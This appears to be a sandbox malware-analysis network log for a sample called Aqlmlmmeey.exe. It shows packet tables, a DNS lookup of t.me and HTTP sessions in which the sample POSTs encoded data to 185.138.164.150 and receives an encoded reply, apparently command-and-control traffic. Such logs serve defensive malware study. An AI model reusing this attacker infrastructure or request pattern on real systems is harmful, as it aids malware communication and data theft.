Sep 28, 2021 07:38:38.089545012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.089612007 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.089972019 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.089998007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090015888 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090087891 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.090327978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090353966 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090373039 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090423107 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.090796947 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090830088 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090873003 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090893030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090903997 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.090918064 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090939999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.090940952 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.091170073 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.091511965 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.091644049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.091670990 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.091715097 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.092317104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.092348099 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.092372894 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.092401028 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.092406988 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.092427969 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.092447996 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.092458963 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.092560053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.093506098 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.093537092 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.093558073 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.093578100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.093585968 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.093596935 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.093616962 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.093622923 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.093673944 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.094712973 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.094743013 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.094763041 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.094782114 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.094820023 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.094839096 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.094841003 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.094877005 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.095307112 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.095335007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.095355034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.095377922 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.095391035 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.095401049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.095422983 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.095423937 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.095443010 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.095480919 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.095514059 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.096155882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096190929 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096213102 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096235037 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096257925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096266985 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.096281052 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096295118 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.096302986 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096323967 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096345901 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096349955 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.096381903 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.096692085 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096761942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096766949 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.096787930 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.096843958 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.097732067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.097819090 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.097841978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.097862959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.097883940 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.097883940 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.097907066 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.097915888 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.097968102 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.098270893 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.098300934 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.098321915 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.098381996 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.098609924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.098634005 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.098685026 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.098690987 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.098753929 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.099263906 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099304914 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099325895 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099348068 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099364042 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.099370956 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099392891 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099396944 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.099451065 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.099854946 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099883080 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099906921 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099930048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099951029 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099972010 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.099977970 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.100028038 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.100423098 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.100450993 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.100471020 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.100502968 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.100519896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.100536108 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.100548983 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.100583076 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.100634098 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.101366043 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.101399899 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.101440907 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.101504087 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.102216959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.102245092 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.102298975 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.102302074 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.102925062 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.102952957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.102978945 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.103002071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.103025913 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.103029013 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.103069067 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105173111 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105242968 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105267048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105290890 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105313063 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105326891 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105336905 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105354071 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105360031 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105386019 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105395079 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105407953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105429888 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105452061 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105457067 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105468035 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105489969 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105510950 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105521917 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105523109 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105542898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105561972 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105567932 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105582952 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105601072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105619907 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105622053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105638981 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105663061 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105671883 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105714083 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.105894089 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.105962038 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.106091022 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.106137991 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.106156111 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.106173992 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.106188059 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.106195927 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.106224060 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.109236002 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.109277010 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.109297991 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.109379053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.109410048 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.116851091 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118292093 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118330002 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118372917 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118381023 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.118429899 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.118710995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118781090 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118804932 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118827105 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118835926 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.118849039 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118870974 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.118880033 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.118926048 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.119563103 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.119590044 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.119714975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.121675014 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121711969 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121731997 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121754885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121778011 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121798038 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121819019 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121841908 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121870041 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121892929 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121915102 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121937990 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.121962070 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122009039 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.122050047 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.122279882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122307062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122327089 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122349977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122379065 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122400999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122448921 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.122509003 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.122555971 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122618914 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.122704029 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122730017 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122792006 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.122884989 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122914076 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122939110 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122961044 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.122967005 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.122986078 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.123012066 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.123013020 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.123054028 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.124169111 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.124205112 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.124231100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.124249935 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.124268055 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.124284983 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.124385118 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.125242949 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125366926 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125392914 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125439882 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.125607014 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125632048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125674009 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.125678062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125703096 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125725031 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125734091 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.125750065 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125772953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125777960 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.125794888 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125816107 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:38.125825882 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:38.125869989 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:39.384624958 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:39.384735107 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:39.419554949 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:39.419580936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:39.675101042 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:39.752639055 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:41.705482960 CEST	49731	80	192.168.2.5	185.138.164.150

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 07:38:23.385222912 CEST	64344	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:38:23.410180092 CEST	53	64344	8.8.8.8	192.168.2.5
Sep 28, 2021 07:38:31.445863962 CEST	62060	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:38:31.465802908 CEST	53	62060	8.8.8.8	192.168.2.5
Sep 28, 2021 07:38:37.557737112 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:38:37.587131977 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 28, 2021 07:38:44.542610884 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:38:44.562351942 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 28, 2021 07:38:56.066941023 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:38:56.091428041 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 28, 2021 07:39:27.531864882 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:39:27.567557096 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 28, 2021 07:39:32.004661083 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:39:32.025794029 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 28, 2021 07:40:06.375650883 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:40:06.403491974 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 28, 2021 07:40:07.535583019 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 28, 2021 07:40:07.564647913 CEST	53	62176	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 28, 2021 07:38:31.445863962 CEST	192.168.2.5	8.8.8.8	0x5e4e	Standard query (0)	t.me	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 28, 2021 07:38:31.465802908 CEST	8.8.8.8	192.168.2.5	0x5e4e	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

t.me

185.138.164.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49730	149.154.167.99	443	C:\Users\user\Desktop\Aqlmlmmeey.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49731	185.138.164.150	80	C:\Users\user\Desktop\Aqlmlmmeey.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 07:38:32.031197071 CEST	956	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 185.138.164.150
Sep 28, 2021 07:38:32.031245947 CEST	956	OUT	Data Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 61 6b 56 58 73 63 48 51 55 2f 54 32 74 2f 42 6f 75 35 34 67 56 79 2f 66 58 77 54 31 78 4d Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3akVXscHQU/T2t/Bou54gVy/fXwT1xMQ6oIV9g4OF5WpIMH4A+7pj7a1XPgNfHdjEXaWb0gbct84=
Sep 28, 2021 07:38:32.506263018 CEST	958	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 05:38:32 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 31 37 31 34 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 64 38 38 64 6a 4c 73 38 4d 45 79 35 35 52 4d 2b 61 63 65 74 4f 7a 79 72 67 49 67 67 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 5a 32 72 75 66 54 50 76 6d 38 77 4b 56 71 32 38 78 30 5a 6d 33 48 58 58 2b 72 38 34 67 32 71 74 46 39 68 6f 62 57 75 57 55 64 50 48 70 62 72 65 39 73 36 66 39 55 62 41 4e 61 47 4e 7a 46 43 4c 65 59 32 46 2b 59 36 5a 41 4d 42 66 72 33 46 4f 55 52 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 56 6c 37 46 66 77 68 6d 75 59 79 74 4f 35 4a 4e 30 42 74 59 4f 54 69 2f 43 73 4b 32 6c 6f 37 53 65 49 6c 63 59 73 56 59 4a 35 79 48 38 70 67 5a 6f 70 54 69 47 6c 68 34 49 31 31 67 57 51 6f 53 74 4d 71 50 62 34 70 50 64 47 50 36 6d 76 44 67 48 49 56 37 44 6e 73 73 68 55 6b 64 31 57 47 66 45 37 6c 4e 6e 6c 6b 49 33 71 79 2f 35 72 49 35 4d 68 77 48 69 4a 7a 58 4d 6f 58 6a 31 6a 62 76 78 4c 64 61 6c 76 50 66 66 58 48 67 67 5a 44 50 72 34 6c 66 45 6f 45 61 6a 79 43 73 47 53 73 71 37 4a 4e 78 59 55 65 4c 79 59 43 37 69 45 57 6f 79 46 6b 37 6b 51 4a 71 33 73 63 54 55 6a 6b 65 34 68 59 47 35 70 6b 41 6e 75 72 76 58 54 56 75 6b 46 31 69 4a 63 41 78 52 34 39 51 6d 73 36 6e 51 65 67 75 56 30 53 69 54 6d 49 33 64 33 69 65 66 51 70 41 73 54 61 51 53 68 6d 2b 42 39 4f 46 38 6e 6a 43 4a 2b 41 77 43 56 